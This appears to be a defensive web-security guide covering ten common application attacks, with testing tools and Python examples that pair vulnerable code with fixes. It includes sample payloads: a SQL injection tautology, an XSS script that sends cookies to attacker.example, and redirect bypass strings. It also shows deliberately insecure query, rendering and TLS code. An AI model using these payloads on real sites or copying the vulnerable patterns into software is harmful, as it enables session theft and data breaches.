Internet applications face a constant stream of attacks from many sources, using a growing range of methods to exploit vulnerabilities in the application or its underlying infrastructure. Application and service providers need to stay increasingly vigilant to keep up. Below are ten of the most commonly used attack methods (in no particular order) and some suggestions on how to counter them.
1. Injection: An injection occurs when hostile data is sent to an interpreter as part of a command or query. SQL, OS command and LDAP injection are the common forms. The hostile data tricks the interpreter into executing commands the attacker intended rather than the ones the developer wrote, and the result is often a data breach.
SQL Inject Me is a Firefox add-on that tests form fields for SQL injection and helps find these flaws before an attacker does. The fix itself is to keep data out of the command: use parameterized queries (prepared statements) instead of building SQL strings by concatenation.
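The following is an added example (not code from the original page or from the SQL Inject Me project) showing the difference between a concatenated query and a parameterized one. It uses Python's built-in sqlite3 module and a constructed in-memory users table; the payload is the classic tautology `x' OR '1'='1`.

```python
import sqlite3

# Constructed sample database for the example: a users table with a
# per-user secret, so the effect of the injection is easy to see.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, secret) VALUES (?, ?)",
        [("alice", "alice-secret"), ("bob", "bob-secret")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Hostile data becomes part of the SQL text, so the interpreter cannot
    # tell where the command ends and the data begins.
    sql = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    # Placeholder binding: the value is passed to the driver separately and
    # is never parsed as SQL, whatever quotes or keywords it contains.
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Constructed attack payload: closes the string literal and appends a
# condition that is always true.
PAYLOAD = "x' OR '1'='1"

if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", lookup_vulnerable(conn, PAYLOAD))  # every user
    print("safe:      ", lookup_safe(conn, PAYLOAD))        # no match
```

With the vulnerable query the WHERE clause becomes `name = 'x' OR '1'='1'` and every row comes back; the parameterized version looks for a user literally named `x' OR '1'='1` and finds nothing.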
2. Cross-site scripting: Cross-Site Scripting (XSS) occurs when an application takes hostile data and sends it to a web browser without proper validation or output escaping. The injected script runs in the victim's browser, where it can hijack the user's session, deface the page, or redirect the user to malicious websites.
OWASP ZAP is a highly recommended tool for finding XSS. The countermeasure is to escape every piece of untrusted data for the HTML context it is written into, and to mark session cookies HttpOnly so that script cannot read them.
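An added example (not from the original page or from the ZAP project) of what output escaping does. Two rendering contexts are shown, element body and attribute value, because a payload that is harmless in one can break out of the other. The payloads and the `attacker.example` host are constructed for the example.

```python
import html


def render_comment_vulnerable(comment: str) -> str:
    # Untrusted text is interpolated straight into the page, so any markup
    # it contains becomes markup in the victim's browser.
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    # html.escape turns < > & " ' into entities; the browser displays the
    # characters instead of interpreting them.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_input_vulnerable(value: str) -> str:
    # Attribute context: a double quote in the value ends the attribute and
    # lets the attacker add an event handler.
    return f'<input name="q" value="{value}">'


def render_input_safe(value: str) -> str:
    # quote=True (the default) is what protects attribute values; escaping
    # only < and > would not be enough here.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def contains_script(fragment: str) -> bool:
    """Crude detector used only to show the effect in the example."""
    return "<script" in fragment.lower()


# Constructed payloads: one for the element body, one for the attribute.
BODY_PAYLOAD = (
    "<script>document.location='https://attacker.example/?c='"
    "+document.cookie</script>"
)
ATTR_PAYLOAD = '" onmouseover="alert(1)'

if __name__ == "__main__":
    print(render_comment_vulnerable(BODY_PAYLOAD))
    print(render_comment_safe(BODY_PAYLOAD))
    print(render_input_vulnerable(ATTR_PAYLOAD))
    print(render_input_safe(ATTR_PAYLOAD))
```

One caveat the example does not cover: escaping does not make a URL safe to put in an `href` or a value safe to put inside a `<script>` block; those contexts need their own rules (allow only http/https schemes, JSON-encode data for script), which is why templating engines that escape by default per context are preferable to hand-built strings like these.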
3. Broken authentication: Broken authentication and session management is a common security risk that can lead to identity theft. If the application functions that handle login, logout, password storage and session tokens are not implemented properly, an attacker can take over accounts and obtain valuable user data, including passwords and credit card information.
Hackbar is a Firefox add-on that makes it easy to probe login forms and session handling by hand for these weaknesses.
4. Insecure direct object references: These occur when an application exposes a reference to an internal object, such as a database key or a file name, in a URL or form parameter. If access is not checked on each request, an attacker can simply change the reference to get their hands on other users' data.
Burp Suite can be used to test web applications for insecure direct object references by replaying requests with altered identifiers.
5. Cross-Site Request Forgery: As the name suggests, these vulnerabilities allow an attacker to forge requests on behalf of an unwitting victim whose browser is logged in to the target site. The web application receiving the request cannot tell whether the user sent it deliberately or the attacker triggered it, because the browser attaches the session cookie either way.
Tamper Data is a commonly used Firefox add-on for changing HTTP/HTTPS headers and POST parameters during testing. Note that the add-on has run into compatibility issues with Google Web Accelerator.
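The standard defence is a synchronizer token: a secret the attacker's page cannot read, which the server requires on every state-changing request. The following is an added example, not code from the original page or from any of the tools it names. The request is modelled as a plain dict standing in for an HTTP POST, and the server key is generated at import time for the demo (in a real deployment it would come from a secret store and be shared across instances).

```python
import hashlib
import hmac
import secrets

# Assumption for the example: a per-deployment secret.  Generated here so the
# block runs stand-alone; in production load it from a secret store.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    # Token = random nonce + HMAC(key, session_id:nonce).  Binding the MAC to
    # the session id means a token issued for one session is useless in another.
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so the check itself does not leak the MAC.
    return hmac.compare_digest(mac, expected)


def handle_transfer(request: dict) -> str:
    """Simplified state-changing handler.  request = {"cookies": {...}, "form": {...}}."""
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return "401 no session"
    # The browser sends the cookie automatically on a forged request, but the
    # attacker's page cannot read the token out of our HTML, so it is missing.
    if not verify_csrf_token(session_id, request.get("form", {}).get("csrf_token", "")):
        return "403 csrf check failed"
    return f"200 transferred {request['form']['amount']}"


if __name__ == "__main__":
    token = issue_csrf_token("sess-1")
    legitimate = {"cookies": {"session": "sess-1"},
                  "form": {"csrf_token": token, "amount": "10"}}
    forged = {"cookies": {"session": "sess-1"}, "form": {"amount": "10"}}
    print(handle_transfer(legitimate))  # 200
    print(handle_transfer(forged))      # 403
```

Tokens here are valid for the life of the session rather than single-use; if you need per-form tokens, store the nonce server-side and delete it on use. Setting the session cookie's SameSite attribute adds a second, independent layer.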
6. Security misconfiguration: Security misconfiguration occurs when the frameworks, platforms, servers and code libraries an application depends on are out of date, left on default settings, or not given a secure, consistently applied configuration.
Microsoft Baseline Security Analyzer can be used to check the configuration of Windows hosts. WATOBO (Web Application Toolbox) is also a good tool for auditing the application itself.
7. Insecure cryptographic storage: Web applications must store sensitive data, such as credit card numbers, passwords, SSNs and similar records, using proper encryption, or, for passwords, a salted one-way hash designed to be slow. If such data is weakly protected, an attacker who obtains a copy of the database can easily read it.
Developers must ensure that the right data is encrypted, avoid known-bad algorithms and home-grown cryptography, and ensure that keys are stored separately from the data they protect.
In addition, developers must be able to identify sensitive data and take steps to clear it from memory as soon as it is no longer needed.
8. Failure to restrict URL access: Most web applications check access rights before showing a link to a protected page, but do not repeat the check every time the page is actually requested. This makes it easy for attackers to guess or forge URLs and reach sensitive data and hidden pages directly.
Veracode's static code analysis tool is a good option for finding URL access vulnerabilities in your application code.
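Items 4 and 8 are two faces of the same missing check: object-level authorization (does this user own record 102?) and function-level authorization (may this role reach /admin/users?). The following is an added example serving both, not code from the original page or any tool it names. The users, invoices and route table are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


class Forbidden(Exception):
    pass


# Constructed sample data: invoice id -> record, including the owning user id.
INVOICES = {
    101: {"owner": 1, "total": "40.00"},
    102: {"owner": 2, "total": "99.00"},
}

# Constructed route table: which roles may reach which path.  Anything not
# listed is denied, so a new page is protected until someone opens it up.
ROUTE_ROLES = {
    "/invoices": {"user", "admin"},
    "/admin/users": {"admin"},
}


def get_invoice_vulnerable(current: User, invoice_id: int) -> dict:
    # Trusts the identifier from the request: any logged-in user who changes
    # ?id=101 to ?id=102 reads someone else's invoice (item 4).
    return INVOICES[invoice_id]


def get_invoice(current: User, invoice_id: int) -> dict:
    # Object-level check on every access: owner or admin only.
    invoice = INVOICES.get(invoice_id)
    if invoice is None or (invoice["owner"] != current.id and current.role != "admin"):
        # Same answer for "not yours" and "does not exist", so the caller
        # cannot enumerate which ids are real.
        raise Forbidden(f"invoice {invoice_id}")
    return invoice


def authorize_route(current: User, path: str) -> None:
    # Function-level check that runs on every request, not only when the
    # link is rendered (item 8).  Unknown paths are denied by default.
    if current.role not in ROUTE_ROLES.get(path, set()):
        raise Forbidden(path)


def can_read_invoice(current: User, invoice_id: int) -> bool:
    try:
        get_invoice(current, invoice_id)
        return True
    except Forbidden:
        return False


def can_access_route(current: User, path: str) -> bool:
    try:
        authorize_route(current, path)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice, root = User(1, "user"), User(3, "admin")
    print(get_invoice_vulnerable(alice, 102))   # bob's invoice, no check
    print(can_read_invoice(alice, 102))          # False
    print(can_access_route(alice, "/admin/users"))  # False
    print(can_access_route(root, "/admin/users"))   # True
```

The point of the helper functions is that the decision lives in one place and is invoked on the request path, not in the template that decides whether to draw a link.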
9. Insufficient transport layer protection: Through transport layer protection, web applications assure users that their interaction with the site is encrypted and authenticated, so their data is protected from attackers on the network. If TLS is missing or badly configured, the browser may warn the user about weak protection. Without it, user confidentiality and sensitive data are at risk. Implementing TLS (Transport Layer Security, the successor to SSL) is the standard way to provide this protection, and the implementation should be checked: current protocol versions only, a valid certificate for the hostname, and strong cipher suites.
Calomel SSL Validation is a useful Firefox add-on for checking the certificate and cipher strength of a connection in this regard.
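On the client side the mistakes are usually in the code, not the server: certificate verification switched off to silence an error, or old protocol versions left enabled. The following is an added example (not from the original page or from Calomel) that builds a hardened `ssl.SSLContext` next to the "make the warning go away" version and audits both with the same checks. It runs offline because it inspects the context rather than opening a connection.

```python
import ssl


def make_client_context() -> ssl.SSLContext:
    # create_default_context() already requires a certificate, checks the
    # hostname and loads the system CA store; we add a protocol floor.
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # no SSLv3, TLS 1.0 or 1.1
    return ctx


def make_insecure_context() -> ssl.SSLContext:
    # The pattern found in far too many scripts: every certificate accepted,
    # so any on-path attacker can impersonate the server.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False      # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx: ssl.SSLContext) -> list:
    """Return a list of findings; an empty list means the context passes."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified")
    if not ctx.check_hostname:
        findings.append("hostname not checked against certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("pre-TLS 1.2 protocol versions allowed")
    return findings


if __name__ == "__main__":
    print("hardened:", audit_context(make_client_context()))
    print("insecure:", audit_context(make_insecure_context()))
    # To use the hardened context for a real connection (not run here):
    #   with socket.create_connection((host, 443)) as sock:
    #       with make_client_context().wrap_socket(sock, server_hostname=host) as tls:
    #           print(tls.version(), tls.cipher())
```

`wrap_socket(..., server_hostname=...)` is what makes the hostname check possible; omitting it on a context with `check_hostname` enabled raises an error rather than silently skipping the check.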
10. Unvalidated redirects and forwards: Web applications sometimes send users to other pages and sites based on a request parameter, without validating its value. These unvalidated redirects can lead the user to malicious pages that phish for credentials or deliver malware, with a link that starts from a trusted domain.
Veracode's static code analysis tool or Watcher (Casaba Security's passive Fiddler add-on, hosted on CodePlex) can be used to find and eliminate this risk in your application code.
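Validating a redirect target is harder than checking for a leading slash, because browsers accept several spellings of "go to another host". The following is an added example (not from the original page or from Veracode or Watcher) that allows only site-relative paths and absolute URLs to an allow-listed host, and rejects the common bypasses; the allowed host is an assumption for the demo.

```python
from urllib.parse import urlparse

# Assumption for the example: the application's own hostnames.
ALLOWED_HOSTS = {"www.example.com"}


def safe_redirect_target(target: str, fallback: str = "/") -> str:
    """Return target if it stays on our site, otherwise the fallback."""
    # Browsers treat a backslash like a forward slash, so "/\evil.example"
    # would be parsed here as a path but followed by the browser as a host.
    candidate = (target or "").strip().replace("\\", "/")
    if not candidate:
        return fallback
    parsed = urlparse(candidate)
    if parsed.scheme:
        # Absolute URL: only http(s), and only to a host we own.  hostname
        # (not netloc) is used so "https://www.example.com@evil.example/"
        # resolves to evil.example and is rejected.
        if parsed.scheme not in ("http", "https"):
            return fallback        # javascript:, data:, vbscript: ...
        if parsed.hostname not in ALLOWED_HOSTS:
            return fallback
        return candidate
    # No scheme.  Exactly one leading slash is a site-relative path.  Two or
    # more ("//evil.example", "///evil.example") are protocol-relative URLs
    # that the browser sends to another host, and anything without a leading
    # slash is ambiguous, so both fall back.
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    return fallback


if __name__ == "__main__":
    # Constructed inputs an attacker might put in ?next=
    for t in ["/account?tab=1", "https://www.example.com/account",
              "//evil.example/", "///evil.example/", "/\\evil.example/",
              "https://www.example.com@evil.example/", "javascript:alert(1)",
              "https://evil.example/", "evil.example"]:
        print(f"{t!r:45} -> {safe_redirect_target(t)!r}")
```

Matching on hostname alone means a port or path on the allowed host is accepted; if the application only lives on one origin, compare `parsed.scheme`, `parsed.hostname` and `parsed.port` together. Where possible, avoid the parameter entirely and redirect by a server-side key into a fixed table of destinations.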
In short, no web application can ever be 100% secure, but consistent security analysis and the countermeasures above can harden applications against most attackers.